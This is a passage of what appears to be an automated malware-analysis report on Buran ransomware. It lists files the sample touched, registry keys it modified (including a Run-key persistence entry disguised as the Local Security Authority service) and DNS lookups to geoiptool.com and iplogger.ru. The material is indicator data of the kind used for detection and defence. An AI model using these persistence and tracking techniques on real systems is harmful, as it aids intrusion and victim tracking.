1468. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_LinkDrop32x32.gif",
1469. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif",
1470. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_MoveDrop32x32.gif",
1471. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif",
1472. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jfr\\default.jfc",
1473. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jfr\\profile.jfc",
1474. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management\\jmxremote.access",
1475. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management\\jmxremote.password.template",
1476. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management\\management.properties",
1477. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management\\snmp.acl.template",
1478. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\blacklist",
1479. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\blacklisted.certs",
1480. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\cacerts",
1481. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\java.policy",
1482. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\java.security",
1483. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\javaws.policy",
1484. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\policy\\limited\\local_policy.jar",
1485. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\policy\\limited\\US_export_policy.jar",
1486. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\policy\\unlimited\\local_policy.jar",
1487. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\policy\\unlimited\\US_export_policy.jar",
1488. "C:\\Program Files\\Microsoft Office\\Office15\\Custom.propdesc",
1489. "C:\\Program Files\\Microsoft Office\\Office15\\Mso Example Setup File A.txt",
1490. "C:\\Program Files\\Microsoft Office\\Office15\\VisioCustom.propdesc",
1491. "C:\\Program Files\\Microsoft Office\\Office15\\1033\\Mso Example Intl Setup File A.txt",
1492. "C:\\Program Files\\Microsoft Office\\Office15\\1033\\Mso Example Intl Setup File B.txt",
1493. "C:\\Program Files\\Microsoft Office\\Office15\\1033\\officeinventoryagentfallback.xml",
1494. "C:\\Program Files\\Microsoft Office\\Office15\\1033\\officeinventoryagentlogon.xml",
1495. "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\prnms006.inf",
1496. "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\prnSendToOneNote15.cat",
1497. "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\prnSendToOneNote15_win7.cat",
1498. "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\prnSendToOneNote15_win7.inf",
1499. "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\SendToOneNote-manifest.ini",
1500. "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\SendToOneNote-PipelineConfig.xml",
1501. "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\SendToOneNote.gpd",
1502. "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\SendToOneNote.ini",
1503. "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\SendToOneNoteNames.gpd",
1504. "C:\\Program Files\\Notepad++\\contextMenu.xml",
1505. "C:\\Program Files\\Notepad++\\functionList.xml",
1506. "C:\\Program Files\\Notepad++\\langs.model.xml",
1507. "C:\\Program Files\\Notepad++\\LICENSE"
1508.  
1509.  
1510. * Modified Registry Keys:
1511. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Local Security Authority Subsystem Service",
1512. "HKEY_CURRENT_USER\\Software\\Buran V\\Service",
1513. "HKEY_CURRENT_USER\\Software\\Buran V\\Service\\Public Key",
1514. "HKEY_CURRENT_USER\\Software\\Buran V\\Service\\Machine ID",
1515. "HKEY_CURRENT_USER\\Software\\Buran V\\Knock",
1516. "HKEY_CURRENT_USER\\Software\\Buran V\\Service\\Paths",
1517. "HKEY_CURRENT_USER\\Software\\Buran V\\Service\\Paths\\0",
1518. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\ED0D73D7-BC97-46E2-AC55-FD6EB3F72C05\\DynamicInfo",
1519. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\DA0ED248-9EDB-4144-B9E7-AFC1D00A662A",
1520. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\B17E070E-57E3-43F6-96F5-A9A9C921DEBF\\DynamicInfo",
1521. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\A14B62F8-6D27-44D8-BFCB-66F44117F2A4",
1522. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\DF000DCA-3FA2-48A6-9E59-C0606F9F8D73\\DynamicInfo",
1523. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\4C64B42C-C15C-4AFB-9A31-7317BC95FE05",
1524. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\F7093373-6201-40B8-8D09-6E7E59E028EB",
1525. "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\VSS\\Diag\\Registry Writer",
1526. "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\VSS\\Diag\\COM+ REGDB Writer",
1527. "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\VSS\\Diag\\ASR Writer",
1528. "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\VSS\\Diag\\Shadow Copy Optimization Writer",
1529. "HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers",
1530. "HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\\(Default)",
1531. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\DA0ED248-9EDB-4144-B9E7-AFC1D00A662A\\data",
1532. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\A14B62F8-6D27-44D8-BFCB-66F44117F2A4\\data",
1533. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\4C64B42C-C15C-4AFB-9A31-7317BC95FE05\\data",
1534. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\F7093373-6201-40B8-8D09-6E7E59E028EB\\data"
1535.  
1536.  
1537. * Deleted Registry Keys:
1538.  
1539. * DNS Communications:
1540.  
1541. "type": "A",
1542. "request": "geoiptool.com",
1543. "answers":
1544.  
1545.  
1546. "type": "A",
1547. "request": "iplogger.ru",
1548. "answers":
1549.  
1550.  
1551.  
1552. * Domains:
1553.  
1554. "ip": "158.69.67.193",
1555. "domain": "geoiptool.com"
1556.  
1557.  
1558. "ip": "88.99.66.31",
1559. "domain": "iplogger.ru"
1560.  
1561.  
1562.  
1563. * Network Communication - ICMP:
1564.  
1565. * Network Communication - HTTP:
1566.  
1567. * Network Communication - SMTP:
1568.  
1569. * Network Communication - Hosts:
1570.  
1571. * Network Communication - IRC: